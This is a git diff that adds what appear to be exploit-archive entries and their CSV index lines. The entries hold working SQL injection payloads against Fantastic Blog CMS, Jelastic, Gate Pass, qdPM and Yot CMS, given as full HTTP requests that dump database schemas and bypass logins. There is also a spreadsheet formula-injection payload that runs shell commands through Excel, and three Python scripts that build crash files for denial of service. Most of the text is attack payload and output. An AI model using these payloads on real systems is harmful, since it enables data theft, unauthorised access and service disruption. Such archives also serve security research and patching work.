diff --git a/exploits/php/webapps/45763.txt b/exploits/php/webapps/45763.txt new file mode 100644 index 000000000..9846df670 --- /dev/null +++ b/exploits/php/webapps/45763.txt @@ -0,0 +1,61 @@ +# Exploit Title: Fantastic Blog CMS 1.0 - 'id' SQL Injection +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://www.sourcecodester.com/users/ronald-ronniem/ +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Ronald%20Ronnie/fantasticblog_0.zip +# Version: 1.0 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/single.php?id=[SQL] +# +#[PATH]/single.php +#.... +#04 $id=$_REQUEST['id']; $query="SELECT * from blogs where id='".$id."'"........... +#05 $row = mysqli_fetch_assoc($result); +#.... +GET /[PATH]/single.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 01 Nov 2018 08:42:57 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/category.php?id=[SQL] +# +#[PATH]/category.php +#.... +#04 $id=$_REQUEST['id']; $query="SELECT * from blog_categories where id='".$id."'"........... +#05 $row = mysqli_fetch_assoc($result);?> +#.... +GET /[PATH]/category.php?id=%2d%34%27%20%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2d%2d%20%2d HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: __atuvc=1%7C44; __atuvs=5bd96b11114f485b000 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 01 Nov 2018 08:46:57 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45764.txt b/exploits/php/webapps/45764.txt new file mode 100644 index 000000000..ae2c94782 --- /dev/null +++ b/exploits/php/webapps/45764.txt @@ -0,0 +1,34 @@ +# Exploit Title: Jelastic 5.4 - 'host' SQL injection +# Google Dork: N/A +# Date: [date] +# Exploit Author: Procode701 +# Vendor Homepage: https://jelastic.com/ +# Software Link: https://jelastic.com/ +# Version: 5.4 +# Tested on: [Kali Linux] +# CVE : N/A + +# POC: +# The application /1.0/users/authentication/rest/signin is vulnerable to SQL injection. +# Vulnerable application Header field: Host:' AND 8494=8494-- ttWV + +# EXPLOIT POC : +# Parameter: Host #1* ((custom) HEADER) +# Type: boolean-based blind +# Payload:' AND 8494=8494-- ttWV +# PAYLOAD: ' AND 8494=8494-- ttWV + +POST /1.0/users/authentication/rest/signin HTTP/1.1 +Host: localhost'-8564' OR 8495=8495-- yjRM--delay=0 +User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 +Accept: */* +Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: https://localhost +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Content-Length: 128 +Cookie: GLang=en; GLocale=en-us; jrouter=b916bf4d3b39e6029fd403f21566f3f1 +DNT: 1 +Connection: close + +charset=UTF-8&hx_lang=en&session=1&ruk=cccc5e05-c0cb-4419-8a34-tab606191&email=testing%40gg.com&password=testing&appid=dashboard \ No newline at end of file diff --git a/exploits/php/webapps/45766.txt b/exploits/php/webapps/45766.txt new file mode 100644 index 000000000..db4e39c8a --- /dev/null +++ b/exploits/php/webapps/45766.txt @@ -0,0 +1,39 @@ +# Exploit Title: Gate Pass Management System 2.1 - 'login' SQL Injection +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.livebms.com +# Software Link: https://netcologne.dl.sourceforge.net/project/gatepass/gpms_Update.zip +# Version: 2.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/login-exec.php +# +POST /[PATH]/login-exec.php HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=dfbpcp36b5ura1aurmtm3dqbr0 +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 119 +login=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&password=%27%6f%72%20%31%3d%31%20%6f%72%20%27%27%3d%27&Submit=Login +HTTP/1.1 302 Found +Date: Thu, 01 Nov 2018 12:08:54 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Set-Cookie: PHPSESSID=e7ed7dtjg0hq3qsv0vil80o086; path=/ +Location: gpms/index.php +Content-Length: 281 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/45767.txt b/exploits/php/webapps/45767.txt new file mode 100644 index 000000000..8bdd181be --- /dev/null +++ b/exploits/php/webapps/45767.txt @@ -0,0 +1,55 @@ +# Exploit Title: qdPM 9.1 - 'filter_by' SQL Injection +# Date: 2018-11-01 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Contact: https://pentest.com.tr +# Vendor Homepage: http://qdpm.net +# Software Link: http://qdpm.net/download-qdpm-free-project-management +# Version: v9.1 +# Category: Webapps +# Tested on: XAMPP for Linux 5.6.38-0 +# Software description: +# Free project management tool for small team +# qdPM is a free web-based project management tool suitable for a small team working on multiple projects. +# It is fully configurable. You can easy manage Projects, Tasks and People. Customers interact +# using a Ticket System that is integrated into Task management. + +# Vulnerabilities: +# The application accommodates 3 different vulnerabilities. +# SQL Injection - Cross-Site Scripting and Denial of Service. + +# POC 1 : SQL Inection : +# An attacker can gain access to all the database information using filter_by[CommentCreatedFrom] +# and filter_by[5BCommentCreatedTo] parameters. + +# Parameter: filter_by[CommentCreatedFrom] and filter_by[5BCommentCreatedTo](POST) +# Request URL: /index.php/timeReport + +# Type: boolean-based blind +# Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause +# Payload: + +filter_by[CommentCreatedFrom]=2018-10-30") RLIKE (SELECT (CASE WHEN (7166=7166) THEN #0x323031382d31302d3330 ELSE 0x28 END)) AND ("votm"="votm&filter_by[CommentCreatedTo]=2018-10-17 + +# Type: error-based +# Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) +# Payload: + +filter_by[CommentCreatedFrom]=2018-10-30") AND EXTRACTVALUE(2944,CONCAT(0x5c,0x716a766b71,(SELECT #(ELT(2944=2944,1))),0x7178717871)) AND ("ilfY"="ilfY&filter_by[CommentCreatedTo]=2018-10-17 + +# Type: stacked queries +# Title: MySQL > 5.0.11 stacked queries (comment) +# Payload: + +filter_by[CommentCreatedFrom]=2018-10-30");SELECT SLEEP(5)#&filter_by[CommentCreatedTo]=2018-10-17 + +# Type: AND/OR time-based blind +# Title: MySQL <= 5.0.11 AND time-based blind (heavy query) +# Payload: + +filter_by[CommentCreatedFrom]=2018-10-30") AND 2173=BENCHMARK(5000000,MD5(0x7652785a)) AND #("PRig"="PRig&filter_by[CommentCreatedTo]=2018-10-17 + +# Type: UNION query +# Title: Generic UNION query (NULL) - 40 columns +# Payload: + +filter_by[CommentCreatedFrom]=2018-10-30") UNION ALL SELECT #33,33,33,33,33,33,33,33,33,33,CONCAT(0x716a766b71,0x474b474f65666b437365466773655373776743495a75536670676f41445249514775775a6f4d6a63,0x7178717871),#33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33,33-- #pqmn&filter_by[CommentCreatedTo]=2018-10-17 \ No newline at end of file diff --git a/exploits/php/webapps/45768.txt b/exploits/php/webapps/45768.txt new file mode 100644 index 000000000..b3a7ab3cc --- /dev/null +++ b/exploits/php/webapps/45768.txt @@ -0,0 +1,58 @@ +# Exploit Title: Yot CMS 3.3.1 - 'aid' SQL Injection +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: https://yot.sourceforge.io/ +# Software Link: https://ayera.dl.sourceforge.net/project/yot/Yot%203.3.1.zip +# Version: 3.3.1 +# Category: Webapps +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# http://localhost/[PATH]/index.php?page=articles&op=art&aid=[SQL] +# +GET /[PATH]/index.php?page=articles&op=art&aid=1++uniON+SElEcT++++0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 01 Nov 2018 23:21:17 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Set-Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 + +# POC: +# 2) +# http://localhost/[PATH]/index.php?page=articles&op=cat&cid=[SQL] +# +GET /[PATH]/index.php?page=articles&op=cat&cid=1++uniON+SElEcT++++0x496873616e%2c(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(selEct(0)frOm(information_schema.COlumns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e),%200x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x)--+- HTTP/1.1 +Host: TARGET +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Cookie: PHPSESSID=eatkahgi05mbjht042ipvtifp5 +Connection: keep-alive +HTTP/1.1 200 OK +Date: Thu, 01 Nov 2018 23:32:28 GMT +Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 +X-Powered-By: PHP/5.6.30 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Transfer-Encoding: chunked +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/windows/local/45765.txt b/exploits/windows/local/45765.txt new file mode 100644 index 000000000..bf884f028 --- /dev/null +++ b/exploits/windows/local/45765.txt @@ -0,0 +1,27 @@ +# Exploit Title: Anviz AIM CrossChex Standard 4.3 - CSV Injection +# Author: Gjoko 'LiquidWorm' Krstic @zeroscience +# Date: 2018-11-01 +# Vendor: Anviz Biometric Technology Co., Ltd. +# Product web page: https://www.anviz.com +# Affected version: 4.3.6.0 +# Tested on: Microsoft Windows 7 Professional SP1 (EN) +# CVE: N/A +# References +# Advisory ID: ZSL-2018-5498 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5498.php + +# Desc: CSV (XLS) Injection (Excel Macro Injection or Formula +# Injection) exists in the AIM CrossChex 4.3 when importing +# or exporting users using xls Excel file. This can be exploited +# to execute arbitrary commands on the affected system via +# SE attacks when an attacker inserts formula payload in the +# 'Name' field when adding a user or using the custom fields +# 'Gender', 'Position', 'Phone', 'Birthday', 'Employ Date' +# and 'Address'. Upon importing, the application will launch +# Excel program and execute the malicious macro formula. + +# PoC +# From the menu: + +User -> Add -> use payload: =cmd|' /C mspaint'!L337 +User -> Import / Export: use payload: =cmd|' /C mspaint'!L337 \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45769.py b/exploits/windows_x86-64/dos/45769.py new file mode 100755 index 000000000..58933d68a --- /dev/null +++ b/exploits/windows_x86-64/dos/45769.py @@ -0,0 +1,28 @@ +# Exploit Title: WinMTR 0.91 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://winmtr.net +# Software Link: http://winmtr.net/winmtr_download/ +# Version: 0.91 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Host: Payload + +#!/usr/bin/python + +buffer = "A" * 238 + +payload = buffer +try: + f=open("exp.txt","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45770.py b/exploits/windows_x86-64/dos/45770.py new file mode 100755 index 000000000..0d230ed42 --- /dev/null +++ b/exploits/windows_x86-64/dos/45770.py @@ -0,0 +1,28 @@ +# Exploit Title: CdCatalog 2.3.1 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://cdcat.sourceforge.net +# Software Link: https://netcologne.dl.sourceforge.net/project/cdcat/cdcat/cdcat-2.3.1/cdcat-2.3.1.tar.bz2 +# Version: 2.3.1 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# CTRL+O & File/Open/exp.hcf + +#!/usr/bin/python + +buffer = "A" * 21 + +payload = buffer +try: + f=open("exp.hcf","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/exploits/windows_x86-64/dos/45772.py b/exploits/windows_x86-64/dos/45772.py new file mode 100755 index 000000000..ff91eef57 --- /dev/null +++ b/exploits/windows_x86-64/dos/45772.py @@ -0,0 +1,28 @@ +# Exploit Title: Zint Barcode Generator 2.6 - Denial of Service (PoC) +# Dork: N/A +# Date: 2018-11-01 +# Exploit Author: Ihsan Sencan +# Vendor Homepage: http://www.zint.org.uk +# Software Link: https://sourceforge.net/projects/zint/files/latest/download +# Version: 2.6 +# Category: Dos +# Tested on: WiN7_x64/KaLiLinuX_x64 +# CVE: N/A + +# POC: +# 1) +# Add 2D Component / 2D Component Data + +#!/usr/bin/python + +buffer = "A" * 44450 + +payload = buffer +try: + f=open("exp.txt","w") + print "[+] Creating %s bytes evil payload." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created." \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index dc9381b99..5bc4341c9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6172,6 +6172,9 @@ id,file,description,date,author,type,platform,port 45760,exploits/windows_x86-64/dos/45760.py,"Artha The Open Thesaurus 1.0.3.0 - Denial of Service (PoC)",2018-11-01,"Ihsan Sencan",dos,windows_x86-64, 45761,exploits/windows_x86-64/dos/45761.py,"WebDrive 18.00.5057 - Denial of Service (PoC)",2018-11-01,"Victor Mondragón",dos,windows_x86-64, 45762,exploits/windows_x86/dos/45762.py,"Arm Whois 3.11 - Denial of Service (PoC)",2018-11-01,"Yair Rodríguez Aparicio",dos,windows_x86, +45769,exploits/windows_x86-64/dos/45769.py,"WinMTR 0.91 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64, +45770,exploits/windows_x86-64/dos/45770.py,"CdCatalog 2.3.1 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64, +45772,exploits/windows_x86-64/dos/45772.py,"Zint Barcode Generator 2.6 - Denial of Service (PoC)",2018-11-02,"Ihsan Sencan",dos,windows_x86-64, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10073,6 +10076,7 @@ id,file,description,date,author,type,platform,port 45738,exploits/windows/local/45738.py,"R 3.4.4 (Windows 10 x64) - Buffer Overflow (DEP/ASLR Bypass)",2018-10-30,"Charles Truscott",local,windows, 45742,exploits/openbsd/local/45742.sh,"xorg-x11-server 1.20.3 - Privilege Escalation",2018-10-30,"Marco Ivaldi",local,openbsd, 45744,exploits/windows/local/45744.rb,"Any Sound Recorder 2.93 - Buffer Overflow Local (SEH) (Metasploit)",2018-10-30,d3ckx1,local,windows, +45765,exploits/windows/local/45765.txt,"Anviz AIM CrossChex Standard 4.3 - CSV Injection",2018-11-02,LiquidWorm,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -40272,3 +40276,8 @@ id,file,description,date,author,type,platform,port 45756,exploits/php/webapps/45756.txt,"Asaancart Simple PHP Shopping Cart 0.9 - Arbitrary File Upload / SQL Injection",2018-10-30,"Ihsan Sencan",webapps,php,80 45757,exploits/php/webapps/45757.txt,"CI User Login and Management 1.0 - Arbitrary File Upload",2018-10-30,"Ihsan Sencan",webapps,php,80 45758,exploits/php/webapps/45758.py,"Loadbalancer.org Enterprise VA MAX 8.3.2 - Remote Code Execution",2018-10-31,"Jakub Palaczynski",webapps,php, +45763,exploits/php/webapps/45763.txt,"Fantastic Blog CMS 1.0 - 'id' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80 +45764,exploits/php/webapps/45764.txt,"Jelastic 5.4 - 'host' SQL Injection",2018-11-02,Procode701,webapps,php,80 +45766,exploits/php/webapps/45766.txt,"Gate Pass Management System 2.1 - 'login' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80 +45767,exploits/php/webapps/45767.txt,"qdPM 9.1 - 'filter_by' SQL Injection",2018-11-02,AkkuS,webapps,php,80 +45768,exploits/php/webapps/45768.txt,"Yot CMS 3.3.1 - 'aid' SQL Injection",2018-11-02,"Ihsan Sencan",webapps,php,80